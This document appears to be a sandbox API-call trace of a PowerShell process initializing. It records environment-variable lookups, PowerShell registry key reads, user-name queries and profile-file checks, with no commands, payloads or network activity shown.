	[0793.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0793.473] CoTaskMemAlloc (cb=0x804) returned 0x1b8fc8f0
	[0793.473] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8fc8f0, nSize=0x24db38 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24db38) returned 0x1
	[0794.492] CoTaskMemFree (pv=0x1b8fc8f0) 
	[0794.492] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0794.492] GetUserNameW (in: lpBuffer=0x4c7640, pcbBuffer=0x24db78 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24db78) returned 1
	[0794.492] CoTaskMemFree (pv=0x4c7640) 
	[0794.492] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d38210*="Available", lpRawData=0x2d37fa0) returned 1
	[0794.547] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0794.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.548] CoTaskMemFree (pv=0x51cbd0) 
	[0794.548] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0794.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.548] CoTaskMemFree (pv=0x51cbd0) 
	[0794.550] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0794.550] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0794.550] CoTaskMemFree (pv=0x51cbd0) 
	[0794.551] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0794.551] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0794.551] CoTaskMemFree (pv=0x51cbd0) 
	[0794.553] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24db58 | out: phkResult=0x24db58*=0x3a4) returned 0x0
	[0794.553] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24dadc, lpData=0x0, lpcbData=0x24dad8*=0x0 | out: lpType=0x24dadc*=0x1, lpData=0x0, lpcbData=0x24dad8*=0x56) returned 0x0
	[0794.553] CoTaskMemAlloc (cb=0x5a) returned 0x1b9044a0
	[0794.553] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24daac, lpData=0x1b9044a0, lpcbData=0x24daa8*=0x56 | out: lpType=0x24daac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24daa8*=0x56) returned 0x0
	[0794.553] CoTaskMemFree (pv=0x1b9044a0) 
	[0794.553] RegCloseKey (hKey=0x3a4) returned 0x0
	[0794.554] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0794.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.555] CoTaskMemFree (pv=0x51cbd0) 
	[0794.590] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0794.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.590] CoTaskMemFree (pv=0x51cbd0) 
	[0795.728] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0795.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.728] CoTaskMemFree (pv=0x51cbd0) 
	[0795.729] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0795.729] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.729] CoTaskMemFree (pv=0x51cbd0) 
	[0795.729] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0795.729] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.729] CoTaskMemFree (pv=0x51cbd0) 
	[0795.730] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0795.730] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.731] CoTaskMemFree (pv=0x51cbd0) 
	[0795.732] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0795.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.732] CoTaskMemFree (pv=0x51cbd0) 
	[0795.733] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0795.733] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.733] CoTaskMemFree (pv=0x51cbd0) 
	[0796.767] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0796.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.767] CoTaskMemFree (pv=0x51cbd0) 
	[0799.759] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x51d010
	[0802.495] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0802.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.495] CoTaskMemFree (pv=0x51d230) 
	[0802.497] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0802.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.497] CoTaskMemFree (pv=0x51d230) 
	[0802.508] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dcb8 | out: phkResult=0x24dcb8*=0x368) returned 0x0
	[0802.508] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24dc3c, lpData=0x0, lpcbData=0x24dc38*=0x0 | out: lpType=0x24dc3c*=0x1, lpData=0x0, lpcbData=0x24dc38*=0x56) returned 0x0
	[0802.508] CoTaskMemAlloc (cb=0x5a) returned 0x1b8fe4a0
	[0802.508] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24dc0c, lpData=0x1b8fe4a0, lpcbData=0x24dc08*=0x56 | out: lpType=0x24dc0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24dc08*=0x56) returned 0x0
	[0802.509] CoTaskMemFree (pv=0x1b8fe4a0) 
	[0802.509] RegCloseKey (hKey=0x368) returned 0x0
	[0802.509] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dcb8 | out: phkResult=0x24dcb8*=0x368) returned 0x0
	[0802.509] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24dc3c, lpData=0x0, lpcbData=0x24dc38*=0x0 | out: lpType=0x24dc3c*=0x1, lpData=0x0, lpcbData=0x24dc38*=0x56) returned 0x0
	[0802.509] CoTaskMemAlloc (cb=0x5a) returned 0x1b8fe4a0
	[0802.509] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24dc0c, lpData=0x1b8fe4a0, lpcbData=0x24dc08*=0x56 | out: lpType=0x24dc0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24dc08*=0x56) returned 0x0
	[0802.509] CoTaskMemFree (pv=0x1b8fe4a0) 
	[0802.509] RegCloseKey (hKey=0x368) returned 0x0
	[0802.510] CoTaskMemAlloc (cb=0x20c) returned 0x1b8e8300
	[0802.510] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8e8300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0802.510] CoTaskMemFree (pv=0x1b8e8300) 
	[0802.510] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d870, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0802.510] CoTaskMemAlloc (cb=0x20c) returned 0x1b8e8300
	[0802.510] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8e8300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0802.510] CoTaskMemFree (pv=0x1b8e8300) 
	[0802.510] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d870, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0802.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0802.511] SetErrorMode (uMode=0x1) returned 0x1
	[0802.511] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24dc20 | out: lpFileInformation=0x24dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0802.512] SetErrorMode (uMode=0x1) returned 0x1
	[0802.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0802.512] SetErrorMode (uMode=0x1) returned 0x1
	[0802.512] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24dc20 | out: lpFileInformation=0x24dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0802.512] SetErrorMode (uMode=0x1) returned 0x1
	[0802.512] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24da10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0802.512] SetErrorMode (uMode=0x1) returned 0x1
	[0802.512] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24dc20 | out: lpFileInformation=0x24dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0802.512] SetErrorMode (uMode=0x1) returned 0x1
	[0802.513] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24da10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0802.513] SetErrorMode (uMode=0x1) returned 0x1
	[0802.513] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24dc20 | out: lpFileInformation=0x24dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0802.513] SetErrorMode (uMode=0x1) returned 0x1
	[0802.513] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0802.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.514] CoTaskMemFree (pv=0x51d230) 
	[0802.514] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0802.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.514] CoTaskMemFree (pv=0x51d230) 
	[0802.514] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0802.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.515] CoTaskMemFree (pv=0x51d230) 
	[0802.515] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0802.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.515] CoTaskMemFree (pv=0x51d230) 
	[0802.516] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0802.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.516] CoTaskMemFree (pv=0x51d230) 
	[0802.517] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0802.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.518] CoTaskMemFree (pv=0x51d230) 
	[0802.519] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0802.519] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24de00 | out: lpMode=0x24de00) returned 1
	[0803.347] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0803.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.347] CoTaskMemFree (pv=0x51d230) 
	[0803.352] SetEvent (hEvent=0x2f0) returned 1
	[0803.352] SetEvent (hEvent=0x368) returned 1
	[0803.352] SetEvent (hEvent=0x38c) returned 1
	[0803.352] SetEvent (hEvent=0x390) returned 1
	[0803.354] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0803.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.354] CoTaskMemFree (pv=0x51d230) 
	[0803.355] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x24db58 | out: phkResult=0x24db58*=0x338) returned 0x0
	[0803.355] RegQueryValueExW (in: hKey=0x338, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x24dadc, lpData=0x0, lpcbData=0x24dad8*=0x0 | out: lpType=0x24dadc*=0x0, lpData=0x0, lpcbData=0x24dad8*=0x0) returned 0x2

Thread:
	id = 508
	os_tid = 0x128c


Thread:
	id = 511
	os_tid = 0x12a8


Thread:
	id = 1111
	os_tid = 0x1708


Thread:
	id = 1118
	os_tid = 0x1724


Thread:
	id = 1133
	os_tid = 0x134c


Thread:
	id = 1151
	os_tid = 0x10e4


Thread:
	id = 1155
	os_tid = 0x1104

	[0577.821] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0641.037] RegCloseKey (hKey=0x2fc) returned 0x0
	[0641.037] RegCloseKey (hKey=0x304) returned 0x0
	[0641.037] RegCloseKey (hKey=0x300) returned 0x0
	[0743.603] LocalFree (hMem=0x4872e0) returned 0x0
	[0743.604] RegCloseKey (hKey=0x314) returned 0x0
	[0743.604] LocalFree (hMem=0x4872c0) returned 0x0
	[0743.604] CloseHandle (hObject=0x2f0) returned 1
	[0743.604] CloseHandle (hObject=0x13) returned 1
	[0743.605] CloseHandle (hObject=0xf) returned 1
	[0757.244] RegCloseKey (hKey=0x2f0) returned 0x0
	[0784.235] RegCloseKey (hKey=0x384) returned 0x0
	[0784.235] RegCloseKey (hKey=0x380) returned 0x0
	[0784.235] RegCloseKey (hKey=0x37c) returned 0x0
	[0784.236] RegCloseKey (hKey=0x378) returned 0x0
	[0784.236] RegCloseKey (hKey=0x374) returned 0x0
	[0784.236] RegCloseKey (hKey=0x370) returned 0x0
	[0784.236] RegCloseKey (hKey=0x36c) returned 0x0
	[0784.237] RegCloseKey (hKey=0x344) returned 0x0
	[0784.237] RegCloseKey (hKey=0x3a0) returned 0x0
	[0784.237] RegCloseKey (hKey=0x39c) returned 0x0
	[0784.237] RegCloseKey (hKey=0x364) returned 0x0
	[0784.238] RegCloseKey (hKey=0x360) returned 0x0
	[0784.238] RegCloseKey (hKey=0x35c) returned 0x0
	[0784.238] RegCloseKey (hKey=0x358) returned 0x0
	[0784.238] RegCloseKey (hKey=0x354) returned 0x0
	[0784.239] RegCloseKey (hKey=0x350) returned 0x0
	[0784.239] RegCloseKey (hKey=0x34c) returned 0x0
	[0784.239] RegCloseKey (hKey=0x348) returned 0x0
	[0784.239] RegCloseKey (hKey=0x398) returned 0x0
	[0784.240] RegCloseKey (hKey=0x338) returned 0x0
	[0784.240] RegCloseKey (hKey=0x334) returned 0x0
	[0784.240] RegCloseKey (hKey=0x330) returned 0x0
	[0784.241] RegCloseKey (hKey=0x32c) returned 0x0
	[0784.241] RegCloseKey (hKey=0x328) returned 0x0
	[0784.241] RegCloseKey (hKey=0x324) returned 0x0
	[0784.241] RegCloseKey (hKey=0x320) returned 0x0
	[0784.242] RegCloseKey (hKey=0x31c) returned 0x0
	[0784.242] RegCloseKey (hKey=0x394) returned 0x0
	[0784.242] RegCloseKey (hKey=0x314) returned 0x0
	[0784.242] RegCloseKey (hKey=0x2f0) returned 0x0
	[0784.243] RegCloseKey (hKey=0x390) returned 0x0
	[0784.243] RegCloseKey (hKey=0x38c) returned 0x0
	[0784.243] RegCloseKey (hKey=0x368) returned 0x0
	[0784.243] RegCloseKey (hKey=0x3a4) returned 0x0
	[0893.093] RegCloseKey (hKey=0x338) returned 0x0

Thread:
	id = 1199
	os_tid = 0x1118


Thread:
	id = 1702
	os_tid = 0x23d4

	[0804.203] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0804.209] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0804.214] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0804.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.214] CoTaskMemFree (pv=0x51d230) 
	[0804.216] VirtualQuery (in: lpAddress=0x1c78da40, lpBuffer=0x1c78e900, dwLength=0x30 | out: lpBuffer=0x1c78e900*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0804.219] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0804.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.219] CoTaskMemFree (pv=0x51d230) 
	[0804.222] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0804.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.222] CoTaskMemFree (pv=0x51d230) 
	[0804.225] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0804.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.225] CoTaskMemFree (pv=0x51d230) 
	[0804.243] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0804.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0804.243] CoTaskMemFree (pv=0x51d230) 
	[0805.338] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0805.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.338] CoTaskMemFree (pv=0x51d230) 
	[0805.340] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0805.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.340] CoTaskMemFree (pv=0x51d230) 
	[0805.346] VirtualQuery (in: lpAddress=0x1c78dcf0, lpBuffer=0x1c78ebb0, dwLength=0x30 | out: lpBuffer=0x1c78ebb0*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0805.346] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0805.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.347] CoTaskMemFree (pv=0x51d230) 
	[0805.349] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0805.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.349] CoTaskMemFree (pv=0x51d230) 
	[0805.350] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0805.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.350] CoTaskMemFree (pv=0x51d230) 
	[0805.351] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0805.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.351] CoTaskMemFree (pv=0x51d230) 
	[0805.356] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0805.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.356] CoTaskMemFree (pv=0x51d230) 
	[0807.022] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0807.022] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.023] CoTaskMemFree (pv=0x51d230) 
	[0807.025] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0807.025] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.025] CoTaskMemFree (pv=0x51d230) 
	[0807.026] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0807.027] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.027] CoTaskMemFree (pv=0x51d230) 
	[0807.029] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0807.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.029] CoTaskMemFree (pv=0x51d230) 
	[0807.031] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0807.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.031] CoTaskMemFree (pv=0x51d230) 
	[0807.032] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0807.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.033] CoTaskMemFree (pv=0x51d230) 
	[0807.034] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0807.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.035] CoTaskMemFree (pv=0x51d230) 
	[0807.821] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0807.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.821] CoTaskMemFree (pv=0x51d230) 
	[0808.462] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0808.462] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0808.463] CoTaskMemFree (pv=0x51d230) 
	[0808.466] CoTaskMemAlloc (cb=0x104) returned 0x51d230
	[0808.466] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x51d230, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0808.466] CoTaskMemFree (pv=0x51d230) 
	[0808.466] CoTaskMemAlloc (cb=0x128) returned 0x4df4d0
	[0808.466] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4df4d0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0808.466] CoTaskMemFree (pv=0x4df4d0) 
	[0808.471] CoTaskMemAlloc (cb=0x20e) returned 0x1b8e9f70
	[0808.471] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8e9f70 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0808.471] CoTaskMemFree (pv=0x1b8e9f70) 
	[0809.422] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0809.423] SetErrorMode (uMode=0x1) returned 0x1
